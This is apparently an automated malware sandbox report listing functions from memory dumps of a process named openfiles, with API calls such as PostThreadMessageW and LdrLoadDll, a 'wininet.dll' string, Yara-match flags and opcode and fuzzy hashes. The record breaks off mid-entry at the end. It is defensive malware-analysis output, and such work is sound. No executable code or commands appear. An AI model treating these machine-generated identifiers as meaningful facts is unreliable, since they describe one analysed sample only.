                                                                                                Function 048E2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: c0b88e7d21a3d248e79c37003c0f811dd7c853c10ba9354d92ff1fe458cbe2bd
                                                                                                • Instruction ID: b7927b824a202ec9364f2d5b93c2aec476d6cb7662fddc421662b914544c5228
                                                                                                • Opcode Fuzzy Hash: c0b88e7d21a3d248e79c37003c0f811dd7c853c10ba9354d92ff1fe458cbe2bd
                                                                                                • Instruction Fuzzy Hash: AE90022130140007F640715858186064005DBE2305F55D511E241D554CDB15D9AA5223
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 56c23c7546d0172637faa0013ef8ed254b948f43b68a3ff92e5a8a74146770e7
                                                                                                • Instruction ID: 75123691a56a0d324c903868bb10a68e80289e9517c5190063558d60b348dbb3
                                                                                                • Opcode Fuzzy Hash: 56c23c7546d0172637faa0013ef8ed254b948f43b68a3ff92e5a8a74146770e7
                                                                                                • Instruction Fuzzy Hash: 3690022160140506F60171584804616000ACBD1245F95C522A302D555ECB25DAE6A132
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b042d01c34c8bda33106f06e6bff142692a08f3c2106e6a4265e51392a6d21be
                                                                                                • Instruction ID: 0a5a7f24711023ca63e5ffe6c1a1d38a5bea961653afde91fafc50a45fde574c
                                                                                                • Opcode Fuzzy Hash: b042d01c34c8bda33106f06e6bff142692a08f3c2106e6a4265e51392a6d21be
                                                                                                • Instruction Fuzzy Hash: F390026120180407F64075584C046070005CBD1306F55C511A306D555E8B29DDA56136
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: ab0ebcf9dd96da9bd4b084e8577c18dcd31fa38e04ffa6c4fe98b39a2db63510
                                                                                                • Instruction ID: 5508e52a32d37b0602ba4e610b130dd06d9ddd8d013b3dfd45927b474ecd0b6a
                                                                                                • Opcode Fuzzy Hash: ab0ebcf9dd96da9bd4b084e8577c18dcd31fa38e04ffa6c4fe98b39a2db63510
                                                                                                • Instruction Fuzzy Hash: 7190022160140046664071688C449064005EFE2215755C621A299D550D8759D9B95666
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b94d349fd366b01b65cd3fbec5bec63e6ffcc92c30d52e19c5a2f253ca22ff21
                                                                                                • Instruction ID: a4e2a50702a193f7e500077ef0d5531c09b6c8c1bc04bad954be111605b66742
                                                                                                • Opcode Fuzzy Hash: b94d349fd366b01b65cd3fbec5bec63e6ffcc92c30d52e19c5a2f253ca22ff21
                                                                                                • Instruction Fuzzy Hash: 9E900221211C0046F70075684C14B070005CBD1307F55C615A215D554CCB15D9B55522
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 06f6ecb65dfe4749f215b66ae735cdd9781c8898512a32379833338ad9bf3446
                                                                                                • Instruction ID: 10d15f59a9e4ef4dd27ff8d9d096845c3d60ccd2a7d8e76f7c83f39439a8fe3a
                                                                                                • Opcode Fuzzy Hash: 06f6ecb65dfe4749f215b66ae735cdd9781c8898512a32379833338ad9bf3446
                                                                                                • Instruction Fuzzy Hash: 9990026134140446F60071584814B060005CBE2305F55C515E306D554D8719DDA66127
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: a50f9c2465a6b93d50174c5d737d9b644ab149cc19ccade6ff4bd0a93eca218c
                                                                                                • Instruction ID: 4fae2e1655ccf52e24db3f728284a2185413f2ed6e6f58dcde960c9c2cabb794
                                                                                                • Opcode Fuzzy Hash: a50f9c2465a6b93d50174c5d737d9b644ab149cc19ccade6ff4bd0a93eca218c
                                                                                                • Instruction Fuzzy Hash: 8B900225211400072605B5580B045070046CBD6355355C521F301E550CD721D9B55122
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 594c79e3d8fc3e6fa9b98a6bde8ffcbcaca1c65263a7308855ccaa2fd2eb4ea4
                                                                                                • Instruction ID: 57229f1c1e2617fb5a0c4cfdbff9c03a15fa78c880137e73a560f65d303f40e8
                                                                                                • Opcode Fuzzy Hash: 594c79e3d8fc3e6fa9b98a6bde8ffcbcaca1c65263a7308855ccaa2fd2eb4ea4
                                                                                                • Instruction Fuzzy Hash: F9900225221400062645B5580A0450B0445DBD7355395C515F341F590CC721D9B95322
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 0c2e83bfe1f4a3741660f715b8483e85f658ee6637f101ef2931d67cf754cbc9
                                                                                                • Instruction ID: df6dcebf1abc95f6fa10d56f00866bb1beedc82cb1eddc6dc43a583560203256
                                                                                                • Opcode Fuzzy Hash: 0c2e83bfe1f4a3741660f715b8483e85f658ee6637f101ef2931d67cf754cbc9
                                                                                                • Instruction Fuzzy Hash: C390023160540806F650715848147460005CBD1305F55C511A202D654D8755DBA976A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 6a5cd4d928102bec90b4decf040b349b69b2ad656b0f2455a45afae9ede03765
                                                                                                • Instruction ID: 8e727d89a11c2596069cc06f0ed04a0130b2bdb1ebd47f37e3265bd85f45e23a
                                                                                                • Opcode Fuzzy Hash: 6a5cd4d928102bec90b4decf040b349b69b2ad656b0f2455a45afae9ede03765
                                                                                                • Instruction Fuzzy Hash: B890023120544846F64071584804A460015CBD1309F55C511A206D694D9725DEA9B662
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: fc2e5b26beeb61706b44775c7e338c90d145cd21980a5241477e71457afd94d9
                                                                                                • Instruction ID: 912abfca113548798402f5942ec4be4491fcd96b84f9e28260d2c4171421ef35
                                                                                                • Opcode Fuzzy Hash: fc2e5b26beeb61706b44775c7e338c90d145cd21980a5241477e71457afd94d9
                                                                                                • Instruction Fuzzy Hash: ED90023120140806F6807158480464A0005CBD2305F95C515A202E654DCB15DBAD77A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: ed0ec0b6af1ec0e905e3245dc828633ed423e0db541f87155055b438a16ee834
                                                                                                • Instruction ID: 2635824ebd6ee951c07a46b5147f5bf148f8712907ec526f06bac173c7836e68
                                                                                                • Opcode Fuzzy Hash: ed0ec0b6af1ec0e905e3245dc828633ed423e0db541f87155055b438a16ee834
                                                                                                • Instruction Fuzzy Hash: 9E90026120240007660571584814616400ACBE1205B55C521E301D590DC725D9E56126
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 5b55a2bcdd96ef3eed2b456a3e10807d67c7cc963bb768980782967eb0d185e7
                                                                                                • Instruction ID: 27fb82eafd6c4f9638750e4b9e66512379eb54bcab359e67f3da9ae30d8ea8fe
                                                                                                • Opcode Fuzzy Hash: 5b55a2bcdd96ef3eed2b456a3e10807d67c7cc963bb768980782967eb0d185e7
                                                                                                • Instruction Fuzzy Hash: D590023160550406F600715849147061005CBD1205F65C911A242D568D8795DAA565A3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 999ecc23b7ea8629a3f57fb4861afcb3382e6dbee8a909a4a3c2f6f644e7a570
                                                                                                • Instruction ID: 0c1b3a7903bdc42f034040411946392a095e1066815a0a74a1f704bd627e474a
                                                                                                • Opcode Fuzzy Hash: 999ecc23b7ea8629a3f57fb4861afcb3382e6dbee8a909a4a3c2f6f644e7a570
                                                                                                • Instruction Fuzzy Hash: 6690022124545106F650715C48046164005EBE1205F55C521A281D594D8755D9A96222
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027A0548 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 027A05CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                • Opcode ID: f2d8ad71d21feb5b131b06fbb234750177f1fe9279b016bda757bed405411fd8
                                                                                                • Instruction ID: 627ab9d98a2d3d919c922b3ab4004f50dc170edb2105fbe60357a4b13b3c0a36
                                                                                                • Opcode Fuzzy Hash: f2d8ad71d21feb5b131b06fbb234750177f1fe9279b016bda757bed405411fd8
                                                                                                • Instruction Fuzzy Hash: FC11C671D4035876EB22AA908C06FEF7B7C9F81B90F048555FA047B180E6746606CBE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027A0550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 027A05CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                • Opcode ID: d8d255d3519498380327bf374f8ac6fca7f100a3d2d4972f4465ffc17d148117
                                                                                                • Instruction ID: 4d1239fa3c4f0c640a6a3ea7a5d31b4f133931a25b5b73fe762e27e2357478a4
                                                                                                • Opcode Fuzzy Hash: d8d255d3519498380327bf374f8ac6fca7f100a3d2d4972f4465ffc17d148117
                                                                                                • Instruction Fuzzy Hash: B6019271D40358B6EB22AAA18C06FDF7B7C9F81B54F048555FA04BB1C0E6B4A606CBE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027A05E6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 543 27a05e6-27a05e9 544 27a059a-27a05be call 27b0de0 543->544 545 27a05eb-27a05f6 543->545 553 27a05e0-27a05e5 544->553 554 27a05c0-27a05d1 PostThreadMessageW 544->554 547 27a05f8-27a05fc 545->547 548 27a061a-27a0620 547->548 549 27a05fe-27a0603 547->549 548->547 552 27a0622-27a0625 548->552 549->548 551 27a0605-27a060a 549->551 551->548 555 27a060c-27a0613 551->555 554->553 556 27a05d3-27a05dd 554->556 557 27a0626-27a0629 555->557 558 27a0615-27a0618 555->558 556->553 558->548 558->557
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 027A05CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                • Opcode ID: 0b1ef992c46958f0026f1ae37b20514f7d60b6e0acb12e23eba5af05e078dbdd
                                                                                                • Instruction ID: b22550458982dae78b9a34f30b04a01b42b775044b954f245d901e3ec8a1e2e8
                                                                                                • Opcode Fuzzy Hash: 0b1ef992c46958f0026f1ae37b20514f7d60b6e0acb12e23eba5af05e078dbdd
                                                                                                • Instruction Fuzzy Hash: 8C01BD30D103A869DB318E784C61FAE7B648BC5378F088B88E9509B2E1D371C141CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B26C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(000007D0), ref: 027B2788
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: net.dll$wininet.dll
                                                                                                • API String ID: 3472027048-1269752229
                                                                                                • Opcode ID: 7ae1b550d93beffd54db50a1af6713ea8ed659054ee0790fe06cafbd31d6b59f
                                                                                                • Instruction ID: fd3c5fe769cc55c1a0f5d65aed47836405ab9f030e606e0cf58986d296476751
                                                                                                • Opcode Fuzzy Hash: 7ae1b550d93beffd54db50a1af6713ea8ed659054ee0790fe06cafbd31d6b59f
                                                                                                • Instruction Fuzzy Hash: 02319AB1601701ABD716DF64C884FE7BBB8FF89304F008529EA5A6B241D770B644CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027AE725 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 027AE747
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID: @J7<
                                                                                                • API String ID: 2538663250-2016760708
                                                                                                • Opcode ID: 7d948918de2f3b1a4ccd36b9539c2b12be20e262c27253a4fa92e214376a1581
                                                                                                • Instruction ID: f560372bf7ee7e681fbcced3cf545a03531716d220f87ed9edb477feaba07175
                                                                                                • Opcode Fuzzy Hash: 7d948918de2f3b1a4ccd36b9539c2b12be20e262c27253a4fa92e214376a1581
                                                                                                • Instruction Fuzzy Hash: 7F3110B5A0020AEFDB00DFD8D8809EFB7B9BF89314B108559E615EB214D775EE05CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027AE730 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 027AE747
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID: @J7<
                                                                                                • API String ID: 2538663250-2016760708
                                                                                                • Opcode ID: 8d68592e039ab1604ab081943f18c70e2124cfd036154e5703af3c29aebd486c
                                                                                                • Instruction ID: 7abcd2589eaf53ed7932e70a17e1ed62316e763716675f466821a87dfb2f5035
                                                                                                • Opcode Fuzzy Hash: 8d68592e039ab1604ab081943f18c70e2124cfd036154e5703af3c29aebd486c
                                                                                                • Instruction Fuzzy Hash: 3A312FB5A0020AEFDB00DFD8D8809EEB7B9BF88314B108559E615EB214D775EE05CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027A3FDC Relevance: 1.6, APIs: 1, Instructions: 54libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 027A3FC2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                • Opcode ID: 6672ef2a07b6f1e0a3a6d9abd784e4acd9ced5a7df60c78b222e6461e5af3310
                                                                                                • Instruction ID: b106097c0a5a84878486f537bce2606ded912e2d39be07eb281d6b4958008c4d
                                                                                                • Opcode Fuzzy Hash: 6672ef2a07b6f1e0a3a6d9abd784e4acd9ced5a7df60c78b222e6461e5af3310
